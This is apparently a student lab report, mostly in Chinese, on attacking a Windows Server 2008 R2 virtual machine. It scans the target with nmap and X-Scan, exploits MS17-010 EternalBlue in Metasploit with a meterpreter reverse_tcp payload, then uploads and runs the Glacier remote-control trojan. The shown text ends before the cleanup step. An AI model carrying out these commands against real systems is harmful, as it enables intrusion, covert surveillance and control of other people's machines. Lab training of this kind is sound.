In nmap, X-Scan vulnerability scanning and Metasploit, the Eternal Blue vulnerability is used to invade the target machine and upload the glacier

1. Purpose of the experiment

Use nmap and X-Scan to scan the target machine’s vulnerabilities, use the scanned Eternal Blue vulnerability to invade the target machine in Metasploit, upload the glacier to control the target machine after establishing a connection, and finally use the glacier trap to clear the target machine’s glacier, and record a complete Intrusion control experiments.

2. Experimental environment

Tool software: VMware, nmap, X-Scan 3.3, Metasploit, Glacier, Glacier Trap

Experiment preparation: virtual machine Kali Linux 2022.2, virtual machine Windows server 2008 r2, virtual machine Windows XP

Note: In this experiment, Kali is the attack aircraft, and XP and 08r2 are the target aircraft

3. Experimental content (experimental steps, test data, etc.)

Check the ip address of 08r2, 192.168.63.131, and use ping to test its network connectivity with Kali, as shown in the figure below:

Check Kali's ip address, 192.168.63.132, and use ping to test its network connectivity with 08r2, as shown below:

The first part, scan with nmap

This part is carried out in the attack machine Kali, the purpose is to scan out the possible vulnerabilities of the target machine and find a breakthrough for the attack

(1) Use nmap to scan the target network, only for host discovery, not port scanning

Use the nmap tool in the Kali terminal of the attacking machine

Command: nmap -sP 192.168.63.0/24 (scanning the surviving hosts on this network segment)

It can be seen that there are 4 hosts surviving on this network segment, among which .131 and .132 are 08r2 and Kali itself, as shown in the figure below:

(2) Use nmap to scan target operating system information and service version information

Command: nmap -nmap -O 192.168.63.131 (scan the operating system information and service version information of the target machine 08r2)

Or command: namp -O 192.168.63.131 (normally, it should be this command, but the 2022.2 version of Kali does not seem to work; this experiment is a long time ago, and the details are not easy to explore) as shown below:

(3) Use the nmap script to scan and find the target host ms08-067, ms17-010 vulnerabilities

命令：nmap --script=Vuln 192.168.63.131（192.168.63.131为08r2的ip地址，即靶机的ip地址）如下图：

扫描发现ms17-010漏洞，无ms08-067漏洞

第二部分，利用X-Scan扫描

本部分在靶机08r2中进行，目的为扫描出自身可能存在的漏洞

执行X-Scan，选择菜单栏设置下的菜单项“扫描模块”，确定要扫描主机的IP地址或者IP地址段，选择菜单栏设置下的菜单项“扫描参数”，扫描一共服务器主机，在指定IP范围框中输入IP地址。并勾选部分扫描参数，设置完毕后，进行漏洞扫描，点击工具栏上的绿色图标“开始”，开始对目标主机进行扫描

靶机08r2的ip地址：192.168.63.131

因为是扫描自身，所以指定IP范围直接指定自身的ip地址即可，当然想要扫描同一网段中其他主机的情况可以在地址簿中添加或者修改范围

设置扫描范围操作截图如下：

字典设置截图如下：

扫描过程截图如下：

扫描结束后，X-Scan会生成一个扫描报告

在报告中具体情况具体分析

X-Scan工具比较古老，适合初学者进行实验。实际已经是比较落后的工具，在不同的环境中扫描结果或许会有出入

第三部分，开始入侵

（1）利用smb协议漏洞exploit ms17_010对靶机进行攻击

命令：msfconsole（在Kali中打开渗透测试工具Metasploit），如下图：

命令：search ms17-010

发现4个攻击模块

命令：use exploit/windows/smb/ms17_010_eternalblue（或者“use 序号”，即“use 0”）

选择第0个攻击模块

上述操作如下图：

命令：show options

查看RHOSTS（目标主机ip，靶机ip）和LHOST（自身ip，自身ip）的设置情况，如下图：

命令：show payloads

查看载荷，如下图：

命令：set payload payload/windows/x64/meterpreter/reverse_tcp

选择上图序号为16的载荷，不同版本Kali序号不同

命令：set RHOST 192.168.63.131

设置目标主机/靶机ip地址，即08r2的ip地址192.168.63.131

命令：set LHOST 192.168.63.132

设置本地主机/攻击机ip地址，即Kali自身的ip地址192.168.63.132

命令：exploit

执行

上述操作如下图：

成功，meterpreter 会话1已打开

第四部分，冰河远程控制

（1）msf建立连接后，利用Meterpreter 命令上传木马到靶机

命令：ps

成功入侵后，查看08r2的系统进程，如下图：

命令：screenshot

拍摄08r2的屏幕截图

命令：run vnc

进行对08r2的屏幕实时监控

上述操作如下图：

（2）让冰河在靶机中运行

命令：upload /home/kali/Desktop/G_Server.exe C:/

upload 木马存储路径目标主机存储路径

利用upload把冰河从本地上传到08r2中，这里选择的是上传到08r2的桌面，即C:/

命令：execute -f C:/G_Server.exe

利用execute命令使冰河在目标主机运行

该命令使冰河G_Server.exe在08r2中运行，打开cmd输入netstat -an，发现7626端口没有被打开（冰河感染的典型特征，正常情况被感染后7626端口会被打开），不过依然有其他特征，第一，08r2进程列表中名为kernel32.exe的进程正在运行，kernel32.exe是冰河感染后运行在C:\Windows\system32的木马进程，如下图：